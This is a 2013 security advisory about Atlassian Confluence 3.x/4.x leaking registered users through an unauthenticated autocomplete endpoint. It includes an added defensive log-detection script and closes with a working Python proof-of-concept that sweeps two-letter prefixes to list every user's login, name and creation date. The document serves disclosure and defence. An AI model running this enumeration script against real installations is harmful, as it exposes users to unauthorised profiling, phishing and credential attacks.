Atlassian Confluence 3.x / 4.x Information Disclosure
Posted Aug 27, 2013
Authored by majinboo

Atlassian Confluence versions 3.x and 4.x allow for anonymous users to list all registered users of the system. The vendor does not believe this is a security concern.

tags | exploit, info disclosure
MD5 | 428d64445ef697372746306caa3d478b

Hello list,

Since the vendor does not seem to care about this issue more than a year
after the initial report (https://jira.atlassian.com/browse/CONF-23985), I
think it is time to share this issue.

-------------------------
Affected products:
-------------------------

Atlassian Confluence 3.x and 4.x (including hosted versions on Atlassian
Cloud)


-------------------------
Details:
-------------------------

WASC-13 - Information Leakage :

When using the search engine at
"http(s)://confluence-installation/dosearchsite.action", any user can
list the wiki's registered users via the "BY :" section of the form.

If a user has no access to registered user profiles (for instance an
anonymous user), information about the users is still displayed by the
quick search autocomplete via the '/rest/prototype/1/search/user.json?'
URI. Even if 'View User Profiles' is disabled in Confluence Admin > Global
Permissions > Anonymous Access, the information is still leaked.


WASC-21 - Insufficient Anti-automation :

The quick search autocomplete is performed via a JavaScript call without any
token verification or anti-brute-force protection. Since only two
characters are needed per query, it is really easy to brute-force the
complete list of registered users.


-------------------------
Mitigation:
-------------------------

The vendor does not provide any patch, and the privacy options in the
Confluence admin do not help mitigate this issue.

To mitigate exploitation of this issue on on-premise installations, the
best solution is to deny access to
'/rest/prototype/1/search/user.json?' from untrusted networks such as the
Internet. Users of hosted versions on Atlassian Cloud are left without
any solution at the moment.
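Both points above, the workaround of denying the endpoint to untrusted
networks and the lack of any anti-automation on the autocomplete call, can
be checked on the server side. The following is an added example, written
for this page and not part of the original advisory or of Confluence: a
Python 3 script that models the network access rule with the standard
ipaddress module and scans access-log lines for the two-character sweep
pattern that an unprotected autocomplete endpoint invites. The trusted
network ranges, the sample log lines (constructed here in the common
"combined" format) and the alert threshold are all assumptions.

```python
#!/usr/bin/env python3
"""Added example (not from the advisory): access-rule model and log-based
detection for the Confluence user autocomplete endpoint.

Assumptions: TRUSTED_NETWORKS, SAMPLE_LOG and the threshold are hypothetical.
"""
import ipaddress
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

LEAK_PATH = "/rest/prototype/1/search/user.json"

# Hypothetical trusted ranges (office / VPN); everything else is "Internet".
TRUSTED_NETWORKS = [ipaddress.ip_network("10.0.0.0/8"),
                    ipaddress.ip_network("192.168.0.0/16")]


def is_allowed(client_ip, target):
    """Model of the 'deny from untrusted networks' mitigation: the leaking
    endpoint is reachable only from TRUSTED_NETWORKS, other paths are untouched.
    The real rule belongs in the reverse proxy in front of Confluence."""
    if urlsplit(target).path != LEAK_PATH:
        return True
    addr = ipaddress.ip_address(client_ip)
    return any(addr in net for net in TRUSTED_NETWORKS)


# Combined log format: ip ident user [time] "METHOD target HTTP/x" status bytes ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def enumeration_suspects(log_lines, threshold=5):
    """Return {client_ip: count} for clients that issued at least `threshold`
    distinct short (<= 2 character) queries against the user endpoint.
    A prefix sweep (aa, ab, ac, ...) produces exactly this pattern, a
    person typing a name does not."""
    queries = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line, skip it
        ip, method, target, status = m.groups()
        parts = urlsplit(target)
        if method != "GET" or parts.path != LEAK_PATH or status != "200":
            continue
        q = parse_qs(parts.query).get("query", [""])[0]
        if len(q) <= 2:
            queries[ip].add(q)
    return {ip: len(qs) for ip, qs in queries.items() if len(qs) >= threshold}


# Constructed sample log: one external client sweeping prefixes, one
# internal user performing a normal name search, one unrelated request.
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Aug/2013:10:00:%02d +0000] "GET %s?query=%s HTTP/1.1" '
    '200 512 "-" "python-httplib"' % (i, LEAK_PATH, q)
    for i, q in enumerate(["aa", "ab", "ac", "ad", "ae", "af"])
] + [
    '192.168.1.20 - alice [27/Aug/2013:10:01:00 +0000] "GET %s?query=bob HTTP/1.1" '
    '200 256 "-" "Mozilla/5.0"' % LEAK_PATH,
    '203.0.113.7 - - [27/Aug/2013:10:02:00 +0000] "GET /dosearchsite.action?queryString=test '
    'HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print("external client allowed:", is_allowed("203.0.113.7", LEAK_PATH + "?query=aa"))
    print("internal client allowed:", is_allowed("192.168.1.20", LEAK_PATH + "?query=aa"))
    print("enumeration suspects:", enumeration_suspects(SAMPLE_LOG))
```

The detection deliberately keys on distinct short queries rather than on
request volume alone, so that a single user who types a few names is not
flagged while a prefix sweep from one address is; the threshold should be
tuned against the site's own traffic before it drives any alerting.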

-------------------------
Proof of concept:
-------------------------

The following Python code will list all registered users of a Confluence
installation (Python 2; usage: python poc.py http(s)://confluence-installation):

#!/usr/bin/env python
import httplib, json, sys, re

# Pick a plain or TLS connection depending on the scheme of the given URL
if (re.search("^https://", sys.argv[1].lower()) == None):
    httpconnection = httplib.HTTPConnection(re.split("^http://", sys.argv[1].lower())[1])
else:
    httpconnection = httplib.HTTPSConnection(re.split("^https://", sys.argv[1].lower())[1])

# Query the autocomplete endpoint with every two-letter prefix (aa .. zz)
for i in map(chr, range(97, 123)):
    for j in map(chr, range(97, 123)):
        httpconnection.request('GET', '/rest/prototype/1/search/user.json?query=' + i + j)
        results = json.loads(httpconnection.getresponse().read())
        for k in range(0, results['totalSize']):
            # Fields are optional in the response, so default each one to None
            try:
                username = results['result'][k]['username']
            except:
                username = None
            try:
                title = results['result'][k]['title']
            except:
                title = None
            try:
                date = results['result'][k]['createdDate']['friendly']
            except:
                date = None
            if (username != None):
                try:
                    print "login:%s - name:%s - creation_date:%s" % (username, title, date)
                except:
                    pass


© 2015 Packet Storm. All rights reserved.